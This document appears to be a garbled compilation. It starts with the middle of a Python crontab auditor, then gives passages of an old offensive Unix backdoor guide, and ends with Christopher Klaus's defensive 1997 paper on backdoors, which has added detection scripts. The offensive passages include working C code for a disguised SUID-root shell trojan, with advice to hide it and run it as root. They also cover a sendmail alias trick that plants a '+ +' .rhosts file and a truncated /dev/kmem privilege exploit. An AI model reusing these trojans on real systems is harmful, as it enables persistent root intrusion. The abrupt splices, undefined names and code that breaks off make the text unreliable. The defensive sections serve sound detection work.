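STANDARD_DIRS = {"/usr/bin", "/usr/sbin", "/usr/lib", "/usr/local/sbin", "/bin", "/sbin"}


def field_ok(spec: str, lo: int, hi: int) -> bool:
    """Accept '*', numbers, ranges a-b, comma lists and */step forms within [lo, hi]."""
    for item in spec.split(","):
        base, _, step = item.partition("/")
        if step and not step.isdigit():
            return False
        if base == "*":
            continue
        a, _, b = base.partition("-")
        if not a.isdigit() or (b and not b.isdigit()):
            return False
        if not lo <= int(a) <= hi or (b and not int(a) <= int(b) <= hi):
            return False
    return True


def parse_crontab(text: str) -> list:
    """Split crontab lines into five time fields and a command; skip comments and VAR=value."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            entries.append({"lineno": lineno, "malformed": raw})
            continue
        entries.append({"lineno": lineno, "time": parts[:5], "command": parts[5]})
    return entries


def audit_crontab(text: str, baseline: set) -> list:
    """Return (lineno, problem) tuples; baseline holds the commands known to belong."""
    findings = []
    for e in parse_crontab(text):
        ln = e["lineno"]
        if "malformed" in e:
            findings.append((ln, "fewer than six fields"))
            continue
        for spec, (name, lo, hi) in zip(e["time"], TIME_FIELDS):
            if not field_ok(spec, lo, hi):
                findings.append((ln, f"{name} field {spec!r} outside {lo}-{hi}"))
        cmd = e["command"]
        prog = cmd.split()[0]
        if cmd not in baseline:
            findings.append((ln, f"command not in baseline: {cmd}"))
        if os.path.dirname(prog) not in STANDARD_DIRS:
            findings.append((ln, f"program {prog} outside standard directories"))
        if any(part.startswith(".") and part not in (".", "..") for part in prog.split("/")):
            findings.append((ln, f"program path {prog} contains a hidden component"))
    return findings


# Constructed baseline and sample: two legitimate jobs, the article's two trojan
# entries, an invalid hour field, and a job hidden under a dot-directory.
KNOWN_JOBS = {"/usr/bin/updatedb", "/usr/lib/newsyslog"}

SAMPLE_CRONTAB = """\
# root's crontab (constructed sample)
0 0 * * 1 /usr/bin/updatedb
15 3 * * * /usr/lib/newsyslog
0 0 * * * /usr/bin/trojancode
29 2 * * * /bin/usr/sneakysneaky_passwd
0 25 * * * /usr/bin/updatedb
*/10 4 * * * /var/tmp/.x/cleanup
"""

if __name__ == "__main__":
    for lineno, problem in audit_crontab(SAMPLE_CRONTAB, KNOWN_JOBS):
        print(f"crontab line {lineno}: {problem}")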



[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is. Make sure it runs as root. Name it something innocuous. Hide it well.

/* A little trojan to create an SUID root shell, if the proper argument is
   given. C code, rather than shell, to hide its obvious effects. */
/* daemon9@netcom.com */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define KEYWORD "industry3"
#define BUFFERSIZE 10

int main(argc, argv)
int argc;
char *argv[];
{
    int i = 0;

    if (argv[1]) {                      /* we've got an argument, is it the keyword? */
        if (!(strcmp(KEYWORD, argv[1]))) {
            /* This is the trojan part. */
            system("cp /bin/csh /bin/.swp121");
            system("chown root /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
        }
    }
    /* Put your possibly system specific trojan
       messages here */
    /* Let's look like we're doing something... */
    printf("Sychronizing bitmap image records.");
    /* system("ls -alR / >& /dev/null > /dev/null&"); */
    for (; i < 10; i++) {
        fprintf(stderr, ".");
        sleep(1);
    }
    printf("\nDone.\n");
    return (0);
}                                       /* End main */



[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:

decode: "|/usr/bin/uudecode"

to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.

#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.

echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts

Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the .rhosts file. For a one liner (not faked, however) do this:

%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com

You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your choosing. Many of the previous scripts and methods can be employed here.







The Covert



[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire. The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.) Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:

get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...

Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.







The Esoteric



[11] /dev/kmem exploit. /dev/kmem represents the virtual memory of the system. Since the kernel keeps its parameters in memory, it is possible to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write permission. The following steps are executed: open the /dev/kmem device, seek to your page in memory, overwrite the UID of your current process, then spawn a csh, which will inherit this UID. The following program does just that.



/* If /kmem is readable and writable, this program will change the user's
   UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
   with some modifications by daemon9@netcom.com */

#include
#include
#include
#include
#include
#include
#include

#define KEYWORD "nomenclature1"

struct user userpage;
long address(), userlocation;

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{

    int count, fd;


System Backdoors Explained

Backdoors

By Christopher Klaus 8/4/97


Since the early days of intruders breaking into computers, they have tried to develop techniques, or backdoors, that allow them to get back into the system. This paper focuses on many of the common backdoors and possible ways to check for them. Most of the focus will be on Unix backdoors, with some discussion of future Windows NT backdoors. It describes the complexity of the issues in trying to determine the methods that intruders use, and gives administrators a basis for understanding how they might be able to stop intruders from getting back in. When an administrator understands how difficult it would be to stop an intruder once they are in, the value of being proactive in blocking the intruder from ever getting in becomes better understood. This is intended to cover many of the popular, commonly used backdoors of beginner and advanced intruders. It is not intended to cover every possible way to create a backdoor, as the possibilities are limitless.


The backdoor for most intruders provides two or three main functions:

Be able to get back into a machine even if the administrator tries to secure it, e.g., by changing all the passwords.

Be able to get back into the machine with the least amount of visibility. Most backdoors provide a way to avoid being logged, and many times the machine can appear to have no one online even while an intruder is using it.

Be able to get back into the machine in the least amount of time. Most intruders want to get back into the machine easily, without having to do all the work of exploiting a hole to gain access.


In some cases, if the intruder thinks the administrator may detect any installed backdoor, they will resort to using the vulnerability repeatedly to get onto the machine as their only backdoor, thus not touching anything that may tip off the administrator. Therefore, in some cases, the vulnerabilities on a machine remain the only unnoticed backdoor.


Password Cracking Backdoor


One of the first and oldest methods intruders used to gain not only access to a Unix machine but also backdoors was to run a password cracker. This uncovers accounts with weak passwords. All these new accounts are now possible backdoors into a machine, even if the system administrator locks out the intruder's current account. Many times, the intruder will look for unused accounts with easy passwords and change the password to something difficult. When the administrator looks for all the weakly passworded accounts, the accounts with modified passwords will not appear. Thus the administrator will not be able to easily determine which accounts to lock out.


Rhosts + + Backdoor


On networked Unix machines, services like Rsh and Rlogin used a simple authentication method based on hostnames that appear in .rhosts. A user could easily configure which machines did not require a password to log in. An intruder who gained access to someone's .rhosts file could put a "+ +" in the file, and that would allow anyone from anywhere to log into that account without a password. Many intruders use this method, especially when NFS is exporting home directories to the world. These accounts become backdoors for intruders to get back into the system. Many intruders prefer using Rsh over Rlogin because it often lacks any logging capability. Many administrators check for "+ +"; therefore an intruder may instead put in a hostname and username from another compromised account on the network, making it less obvious to spot.
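The paragraph above gives the administrator two things to look for: wildcard entries, and non-wildcard entries that name a host the site never meant to trust. The following is an added example (not code from the paper) of an audit over .rhosts / hosts.equiv content that does both; the file contents and the allowlist of trusted hosts are constructed here and would be read from ~user/.rhosts, /etc/hosts.equiv and a site inventory in practice.

```python
"""Audit .rhosts / hosts.equiv trust entries.

Added example, not part of the original paper. SAMPLE_RHOSTS and
TRUSTED_HOSTS are constructed; adjust TRUSTED_HOSTS to the hosts your
site deliberately trusts.
"""

# Hosts that are legitimately allowed to appear (assumed site allowlist).
TRUSTED_HOSTS = {"build.example.internal"}

# Constructed sample of a .rhosts file that an intruder has edited.
SAMPLE_RHOSTS = """\
# normal entry
build.example.internal deploy
+ +
+ alice
dbserver.example.internal +
-badhost.example.internal
wkstn07.example.internal bob
"""


def parse_rhosts(text):
    """Yield (hostname, username) tuples; username is None when omitted.
    Comment and blank lines are skipped, as the r-services do."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        host = parts[0]
        user = parts[1] if len(parts) > 1 else None
        yield host, user


def audit_rhosts(text, trusted_hosts=TRUSTED_HOSTS):
    """Return (severity, host, user, reason) findings for every trust grant
    that is either a wildcard or names a host outside the allowlist."""
    findings = []
    for host, user in parse_rhosts(text):
        if host.startswith("-"):
            continue  # explicit deny entries do not grant access
        if host == "+" and user == "+":
            findings.append(("critical", host, user, "any user from any host"))
        elif host == "+":
            findings.append(("critical", host, user, "named user from any host"))
        elif user == "+":
            findings.append(("critical", host, user, "any user from this host"))
        elif host not in trusted_hosts:
            # The quieter variant the paper describes: a real-looking host
            # that the site never chose to trust.
            findings.append(("warning", host, user, "host not in allowlist"))
    return findings


if __name__ == "__main__":
    for finding in audit_rhosts(SAMPLE_RHOSTS):
        print(*finding)
```

The allowlist comparison is what catches the "hostname and username from another compromised account" variant; a check that only greps for "+" misses it.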


Checksum and Timestamp Backdoors


Early on, many intruders replaced binaries with their own trojan versions. Many system administrators relied on time-stamping and the system checksum programs, e.g., Unix's sum program, to try to determine when a binary file had been modified. Intruders have developed technology that will recreate the same time-stamp for the trojan file as the original file. This is accomplished by setting the system clock back to the original file's time and then adjusting the trojan file's time to the system clock. Once the binary trojan file has the exact same time as the original, the system clock is reset to the current time. The sum program relies on a CRC checksum and is easily spoofed. Intruders have developed programs that will modify the trojan binary to have the necessary original checksum, thus fooling the administrators. MD5 checksums are the choice recommended by most vendors today. MD5 is based on an algorithm that no one has yet proven can be spoofed.


Login Backdoor


On Unix, the login program is the software that usually does the password authentication when someone telnets to the machine. Intruders grabbed the source code to login.c and modified it so that when login compared the user's password with the stored password, it would first check for a backdoor password. If the user typed in the backdoor password, it would allow them to log in regardless of what the administrator set the passwords to. Thus this allowed the intruder to log into any account, even root. The password backdoor would spawn access before the user actually logged in and appeared in utmp and wtmp. Therefore an intruder could be logged in and have shell access without it appearing that anyone is on that machine as that account. Administrators started noticing these backdoors, especially if they ran the "strings" command to find what text was in the login program. Many times the backdoor password would show up. The intruders then encrypted or hid the backdoor password better so it would not appear by just running strings. Many administrators can detect these backdoors with MD5 checksums.


Telnetd Backdoor


When a user telnets to the machine, the inetd service listens on the port, receives the connection and then passes it to in.telnetd, which then runs login. Some intruders knew the administrator was checking the login program for tampering, so they modified in.telnetd. Within in.telnetd, several checks are done on input from the user, for things like what kind of terminal the user is using. Typically, the terminal setting might be Xterm or VT100. An intruder could backdoor it so that when the terminal was set to "letmein", it would spawn a shell without requiring any authentication. Intruders have backdoored some services so that any connection from a specific source port can spawn a shell.


Services Backdoor


Almost every network service has at one time been backdoored by an intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even inetd, etc., have been floating around forever. There are programs that are nothing more than a shell connected to a TCP port, with maybe a backdoor password to gain access. These programs sometimes replace a service like uucp that never gets used, or they get added to the inetd.conf file as a new service. Administrators should be very wary of what services are running and analyze the original services by MD5 checksums.


Cronjob backdoor


Cron on Unix schedules when certain programs should be run. An intruder could add a backdoor shell program to run between 1 AM and 2 AM. So for one hour every night, the intruder could gain access. Intruders have also looked at legitimate programs that typically run from cron and built backdoors into those programs as well.


Library backdoors


Almost every UNIX system uses shared libraries. The shared libraries are intended to reuse many of the same routines, thus cutting down on the size of programs. Some intruders have backdoored some of the routines, like crypt.c and _crypt.c. Programs like login.c would use the crypt() routine, and if a backdoor password was used it would spawn a shell. Therefore, even if the administrator was checking the MD5 of the login program, it was still spawning a backdoor routine, and many administrators were not checking the libraries as a possible source of backdoors.


One problem for many intruders was that some administrators started taking MD5 checksums of almost everything. One method intruders used to get around that is to backdoor the open() and file access routines. The backdoor routines were configured to read the original files but execute the trojan backdoors. Therefore, when the MD5 checksum program was reading these files, the checksums always looked good. But when the system ran the program, it executed the trojan version. Even the trojan library itself could be hidden from the MD5 checksums. One way an administrator could get around this backdoor was to statically link the MD5 checksum checker and run it on the system. The statically linked program does not use the trojan shared libraries.


Kernel backdoors


The kernel on Unix is the core of how Unix works. The same method used for libraries to bypass MD5 checksums could be used at the kernel level, except that even a statically linked program could not tell the difference. A good backdoored kernel is probably one of the hardest for administrators to find; fortunately, kernel backdoor scripts have not yet been widely made available, and no one knows how widespread they really are.


File system backdoors


An intruder may want to store their loot or data on a server somewhere without the administrator finding the files. The intruder's files can typically contain their toolbox of exploit scripts, backdoors, sniffer logs, copied data like email messages, source code, etc. To hide these sometimes large files from an administrator, an intruder may patch the file system commands like "ls", "du", and "fsck" to hide the existence of certain directories or files. At a very low level, one intruder's backdoor created a section of the hard drive in a proprietary format that was designated as "bad" sectors. Thus the intruder could access those hidden files only with special tools, but to the regular administrator it is very difficult to determine that the marked "bad" sectors were indeed the storage area for a hidden file system.


Bootblock backdoors


In the PC world, many viruses have hidden themselves within the bootblock section, and most antivirus software will check to see if the bootblock has been altered. On Unix, most administrators do not have any software that checks the bootblock; therefore some intruders have hidden backdoors in the bootblock area.


Process hiding backdoors


An intruder many times wants to hide the programs they are running. The programs they want to hide are commonly a password cracker or a sniffer. There are quite a few methods, and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look like another process name.

An intruder could rename the sniffer program to a legitimate service like in.syslog and run it. Thus when an administrator does a "ps" or looks at what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show all the processes.

An intruder could patch a backdoor or program into an interrupt-driven routine so it does not appear in the process table. An example backdoor using this technique is amod.tar.gz, available on http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html (Not There any more)

An intruder could modify the kernel to hide certain processes as well.
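The first two methods above (rewriting argv[] and renaming the binary to a service name) only change what the process reports about itself. On Linux the kernel also exposes, per process, the executable it actually mapped (/proc/PID/exe), which the process cannot rewrite. The block below is an added example (not the paper's code) that compares the two; SAMPLE_PROCS is a constructed snapshot in the shape snapshot_proc() produces from a live /proc, and the list of user-writable prefixes is an assumption to adapt per site. It does not help against the library- or kernel-level hiding in the last three items, where the listing itself is lying.

```python
"""Flag processes whose reported name disagrees with the executable actually running.

Added example, not from the paper. SAMPLE_PROCS is constructed;
snapshot_proc() reads the live Linux process table in the same shape.
"""
import os

SAMPLE_PROCS = [
    {"pid": 812,  "comm": "sshd",      "cmdline": "/usr/sbin/sshd -D", "exe": "/usr/sbin/sshd"},
    {"pid": 2231, "comm": "in.syslog", "cmdline": "in.syslog",         "exe": "/home/guest/.x/sniff"},
    {"pid": 2290, "comm": "httpd",     "cmdline": "httpd",             "exe": "/tmp/.cache/crack (deleted)"},
    {"pid": 2301, "comm": "bash",      "cmdline": "-bash",             "exe": "/usr/bin/bash"},
]

# Locations a packaged daemon would never run from (assumed site policy).
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def snapshot_proc():
    """Collect comm, cmdline and the exe link for every readable process (Linux only)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{pid}"
        try:
            with open(f"{base}/comm") as f:
                comm = f.read().strip()
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            exe = os.readlink(f"{base}/exe")
        except OSError:
            continue  # kernel thread, process already gone, or not our process
        procs.append({"pid": int(pid), "comm": comm, "cmdline": cmdline, "exe": exe})
    return procs


def suspicious_processes(procs, untrusted_prefixes=UNTRUSTED_PREFIXES):
    """Return (pid, exe, reasons) for processes whose self-reported identity
    does not match the mapped executable, or whose executable lives somewhere
    a service binary should not."""
    findings = []
    for p in procs:
        exe = p["exe"]
        deleted = exe.endswith(" (deleted)")
        exe_path = exe[: -len(" (deleted)")] if deleted else exe
        real_name = os.path.basename(exe_path)
        argv0 = p["cmdline"].split()[0].lstrip("-") if p["cmdline"] else ""
        reasons = []
        # comm is truncated to 15 characters by the kernel, so compare on that length.
        if real_name[:15] != p["comm"] and os.path.basename(argv0) != real_name:
            reasons.append("reported name differs from executable")
        if exe_path.startswith(untrusted_prefixes):
            reasons.append("executable in user-writable location")
        if deleted:
            reasons.append("executable unlinked after start")
        if reasons:
            findings.append((p["pid"], exe, reasons))
    return findings


if __name__ == "__main__":
    for pid, exe, reasons in suspicious_processes(SAMPLE_PROCS):
        print(pid, exe, "; ".join(reasons))
```

Run against snapshot_proc() as root so that every /proc/PID/exe is readable; a process that has been hidden from ps by a trojaned library will still be missed, which is the point the paper makes about statically linked checkers and trusted boot media.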


Rootkit


One of the most popular packages to install backdoors is rootkit. It can easily be located using Web search engines. From the Rootkit README, here are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.


Network traffic backdoors


Not only do intruders want to hide their tracks on the machine, but they also want to hide their network traffic as much as possible. These network traffic backdoors sometimes allow an intruder to gain access through a firewall. There are many network backdoor programs that allow an intruder to set up on a certain port number on a machine, which will allow access without ever going through the normal services. Because the traffic is going to a non-standard network port, the administrator can overlook the intruder's traffic. These network traffic backdoors typically use TCP, UDP, and ICMP, but could use many other kinds of packets.


TCP Shell Backdoors


The intruder can set up these TCP shell backdoors on some high port number, possibly where the firewall is not blocking that TCP port. Many times they will be protected with a password, just so that an administrator who connects to it will not immediately see shell access. An administrator can look for these connections with netstat to see what ports are listening and where current connections are going to and from. Many times, these backdoors allow an intruder to get past TCP Wrapper technology. These backdoors could be run on the SMTP port, which many firewalls allow traffic to pass through for e-mail.
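The netstat check the paragraph recommends is only useful against a known baseline: a listener is "odd" because the host is not supposed to offer that service, and a connection is odd because of where it goes. The following is an added example (not from the paper) that turns a netstat -an style capture into those two comparisons. SAMPLE_NETSTAT is a constructed capture, and EXPECTED_LISTENERS and INTERNAL_NET are assumed site values.

```python
"""Compare listening sockets and established peers against a site baseline.

Added example, not the paper's code. SAMPLE_NETSTAT is a constructed
`netstat -an` style capture; EXPECTED_LISTENERS and INTERNAL_NET are
assumptions standing in for a real service inventory.
"""
import ipaddress

SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:40123           0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51234          ESTABLISHED
tcp        0      0 10.0.0.5:40123          203.0.113.7:40001       ESTABLISHED
udp        0      0 0.0.0.0:53              0.0.0.0:*
"""

# Services this host is supposed to offer (assumed baseline).
EXPECTED_LISTENERS = {("tcp", 22), ("tcp", 25), ("udp", 53)}
# Address space from which shell sessions are expected (assumed).
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")


def parse_netstat(text):
    """Turn the table into dicts; tcp6/udp6 are folded into tcp/udp."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or not f[0].startswith(("tcp", "udp")):
            continue
        rows.append({"proto": f[0].rstrip("6"), "local": f[3], "foreign": f[4],
                     "state": f[5] if len(f) > 5 else ""})
    return rows


def split_endpoint(endpoint):
    """'host:port' -> (host, port); rsplit keeps IPv6 addresses intact."""
    host, port = endpoint.rsplit(":", 1)
    return host, port


def listening_sockets(rows):
    """(proto, port) for TCP sockets in LISTEN and UDP sockets bound with no peer."""
    found = set()
    for r in rows:
        _, port = split_endpoint(r["local"])
        if r["state"] == "LISTEN" or (r["proto"] == "udp" and r["foreign"].endswith(":*")):
            found.add((r["proto"], int(port)))
    return found


def unexpected_listeners(text, expected=EXPECTED_LISTENERS):
    """Listeners present on the host that the baseline does not account for."""
    return sorted(listening_sockets(parse_netstat(text)) - expected)


def external_connections(text, internal=INTERNAL_NET):
    """Established connections whose peer lies outside the internal network."""
    out = []
    for r in parse_netstat(text):
        if r["state"] != "ESTABLISHED":
            continue
        peer_host, _ = split_endpoint(r["foreign"])
        if ipaddress.ip_address(peer_host) not in internal:
            out.append((r["local"], r["foreign"]))
    return out


if __name__ == "__main__":
    print("unexpected listeners:", unexpected_listeners(SAMPLE_NETSTAT))
    print("external connections:", external_connections(SAMPLE_NETSTAT))
```

A backdoor placed on port 25 would pass the listener check, which is why the second comparison (peer address on an established session) is kept separate; and since the paper's rootkit list includes a netstat that hides connections to chosen hosts, the capture should come from a statically linked or known-good netstat.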


UDP Shell Backdoors



Administrators many times can spot a TCP connection and notice the odd behavior, while UDP shell backdoors lack any connection, so netstat would not show an intruder accessing the Unix machine. Many firewalls have been configured to allow UDP packets for services like DNS through. Many times, intruders will place the UDP shell backdoor on that port and it will be allowed to bypass the firewall.


ICMP Shell Backdoors


Ping is one of the most common ways to find out if a machine is alive, by sending and receiving ICMP packets. Many firewalls allow outsiders to ping internal machines. An intruder can put data in the ping ICMP packets and tunnel a shell between the pinging machines. An administrator may notice a flurry of ping packets, but unless the administrator looks at the data in the packets, an intruder can go unnoticed.


Encrypted Link


An administrator can set up a sniffer to try to see data that looks like someone accessing a shell, but an intruder can add encryption to the network traffic backdoors, and it becomes almost impossible to determine what is actually being transmitted between the two machines.


Windows NT


Because Windows NT does not easily allow multiple users on a single machine and remote access similar to Unix, it becomes harder for the intruder to break into Windows NT, install a backdoor, and launch an attack from it. Thus you will more frequently find network attacks that are springboarded from a Unix box than from Windows NT. As Windows NT advances in multi-user technologies, this may give a higher frequency of intruders who use Windows NT to their advantage. And if this does happen, many of the concepts from Unix backdoors can be ported to Windows NT, and administrators can be ready for the intruder. Today, there are already telnet daemons available for Windows NT. As for network traffic backdoors, they are very feasible for intruders to install on Windows NT.


Solutions


As backdoor technology advances, it becomes even harder for administrators to determine whether an intruder has gotten in or whether they have been successfully locked out.


Assessment


One of the first steps in being proactive is to assess how vulnerable your network is, thus being able to figure out what holes exist that should be fixed. Many commercial tools exist to help scan and audit the network and systems for vulnerabilities. Many companies could dramatically improve their security if they only installed the security patches made freely available by their vendors.


MD5 Baselines


One necessary component of a system scanner is MD5 checksum baselines. This MD5 baseline should be built up before a hacker attack, from clean systems. Once a hacker is in and has installed backdoors, trying to create a baseline after the fact could incorporate the backdoors into the baseline. Several companies had been hacked and had backdoors installed on their systems for many months. Over time, all the backups of the systems contained the backdoors. When some of these companies found out they had a hacker, they restored a backup in hopes of removing any backdoors. The effort was futile, since they were restoring all the files, even the backdoored ones. The binary baseline comparison needs to be done before an attack happens.
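The baseline the paper asks for is a table of digests recorded from a clean system and compared later; the "Checksum and Timestamp Backdoors" section explains why neither the timestamp nor sum(1)'s CRC can be trusted on its own. The following is an added example (not the paper's or any tool's code) of such a baseline. It uses SHA-256 rather than MD5, since MD5 collisions have been demonstrated in the years since the paper was written, and its demo() constructs a temporary directory in which a binary is replaced by a same-size file with the original timestamp restored, exactly the trick the paper describes, to show that the digest comparison still catches it.

```python
"""Build and verify a file-integrity baseline.

Added example, not from the paper. The files in demo() are constructed in
a temporary directory; in practice the baseline is written to read-only or
off-host storage before the system is exposed.
"""
import hashlib
import json
import os
import tempfile


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record size, mtime and digest of every regular file under root."""
    baseline = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            st = os.stat(path)
            baseline[os.path.relpath(path, root)] = {
                "size": st.st_size, "mtime": int(st.st_mtime), "sha256": file_digest(path)}
    return baseline


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def verify_baseline(root, baseline):
    """Compare the tree against a stored baseline. A changed file whose size
    and mtime still match is flagged as such: that combination is what a
    timestamp-restoring replacement looks like."""
    current = build_baseline(root)
    report = {"changed": {}, "missing": [], "new": []}
    for rel, old in baseline.items():
        new = current.get(rel)
        if new is None:
            report["missing"].append(rel)
        elif new["sha256"] != old["sha256"]:
            report["changed"][rel] = {"timestamp_preserved": new["mtime"] == old["mtime"],
                                      "size_preserved": new["size"] == old["size"]}
    report["new"] = sorted(rel for rel in current if rel not in baseline)
    return report


def demo():
    """Constructed scenario: baseline a 'bin' directory, then replace a binary
    with a same-size file and put the original mtime back."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "bin")
        os.mkdir(bin_dir)
        login = os.path.join(bin_dir, "login")
        with open(login, "wb") as f:
            f.write(b"original login binary\n" * 64)
        baseline_path = os.path.join(root, "baseline.json")  # kept outside the tree being checked
        save_baseline(build_baseline(bin_dir), baseline_path)

        st = os.stat(login)
        with open(login, "wb") as f:
            f.write(b"replaced login binary\n" * 64)   # same length as the original
        os.utime(login, ns=(st.st_atime_ns, st.st_mtime_ns))  # timestamp restored
        with open(os.path.join(bin_dir, ".swp121"), "wb") as f:
            f.write(b"x")                                # an extra file appears
        return verify_baseline(bin_dir, load_baseline(baseline_path))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

As the library and kernel sections point out, the checker is only as trustworthy as the open() and read() it runs on: run it as a statically linked binary, or from known-good boot media, and keep the baseline file where a process on the audited host cannot rewrite it.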


Intrusion detection


Intrusion detection is becoming more important as organizations are hooking up and allowing connections to some of their machines. Most of the older intrusion detection technology was based on logged events. The latest intrusion detection system (IDS) technology is based on real-time sniffing and network traffic security analysis. Many of the network traffic backdoors can now easily be detected. The latest IDS technology can take a look at the DNS UDP packets and determine whether they match DNS protocol requests. If the data on the DNS port does not match the DNS protocol, an alert can be signaled and the data captured for further analysis. The same principle can be applied to the data in an ICMP packet to see if it is the normal ping data or if it is carrying an encrypted shell session.
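The protocol-conformance idea in this paragraph, and in the UDP and ICMP shell sections above, can be shown on bytes. The block below is an added example (not the paper's code, nor any IDS product's): looks_like_dns() checks that a UDP/53 payload parses as a DNS header followed by a well-formed question section, and icmp_echo_payload_is_standard() compares an echo payload against the fill patterns common ping implementations emit. The sample payloads are constructed, and the two ping patterns are assumptions about iputils and Windows ping to be adjusted to what your own hosts actually send.

```python
"""Protocol-conformance checks for traffic that firewalls commonly pass.

Added example, not from the paper. Sample payloads are constructed; the
ping fill patterns are assumptions about common implementations.
"""
import struct

# Assumed fill patterns: iputils writes incrementing bytes after an 8-byte
# timestamp; Windows ping sends a fixed alphabetic string.
LINUX_PING_DATA = bytes(range(0x08, 0x38))
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"

# Constructed sample of shell output that a UDP/53 tunnel might carry.
SHELL_OVER_DNS_PORT = b"uid=0(root) gid=0(root) groups=0(root)\n"


def build_dns_query(name, qtype=1, txid=0x1234):
    """Construct a standard DNS query (RD set, one A question) as test input."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = [label.encode() for label in name.strip(".").split(".")]
    qname = b"".join(bytes([len(label)]) + label for label in labels) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def looks_like_dns(payload):
    """True if payload parses as an RFC 1035 header plus question section."""
    if len(payload) < 12:
        return False
    _txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    opcode = (flags >> 11) & 0xF
    # Opcodes above 2 are unassigned or rare; bit 6 is reserved and must be zero.
    if opcode > 2 or flags & 0x0040 or not 1 <= qdcount <= 16:
        return False
    pos = 12
    for _ in range(qdcount):
        while True:                       # walk the QNAME labels
            if pos >= len(payload):
                return False
            length = payload[pos]
            if length == 0:               # root label ends the name
                pos += 1
                break
            if length & 0xC0 == 0xC0:     # compression pointer ends the name
                pos += 2
                break
            if length > 63 or pos + 1 + length > len(payload):
                return False
            pos += 1 + length
        if pos + 4 > len(payload):        # QTYPE and QCLASS must follow
            return False
        _qtype, qclass = struct.unpack("!HH", payload[pos:pos + 4])
        if qclass not in (1, 3, 4, 254, 255):   # IN, CH, HS, NONE, ANY
            return False
        pos += 4
    return True


def icmp_echo_payload_is_standard(payload):
    """True if the echo data matches a known ping fill pattern."""
    if payload == WINDOWS_PING_DATA:
        return True
    if len(payload) > 8 and payload[8:] == LINUX_PING_DATA[: len(payload) - 8]:
        return True
    return False


if __name__ == "__main__":
    print("query ok:", looks_like_dns(build_dns_query("www.example.com")))
    print("shell on 53 ok:", looks_like_dns(SHELL_OVER_DNS_PORT))
    print("ping ok:", icmp_echo_payload_is_standard(b"\x00" * 8 + LINUX_PING_DATA))
```

Anything that fails these checks is worth capturing rather than dropping outright: DNS over UDP/53 that is merely unusual (EDNS options, large qdcount) should tune the parser, while a payload that is plainly not DNS at all is the case the paragraph describes.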


Boot from CD-ROM

Some administrators may want to consider booting from CD-ROM, thus eliminating the possibility of an intruder installing a backdoor on the CD-ROM. The problem with this method is the cost and time of implementing this solution enterprise-wide.


Vigilant


Because the security field is changing so fast, with new vulnerabilities being announced daily and intruders constantly designing new attack and backdoor techniques, no security technology is effective without vigilance.

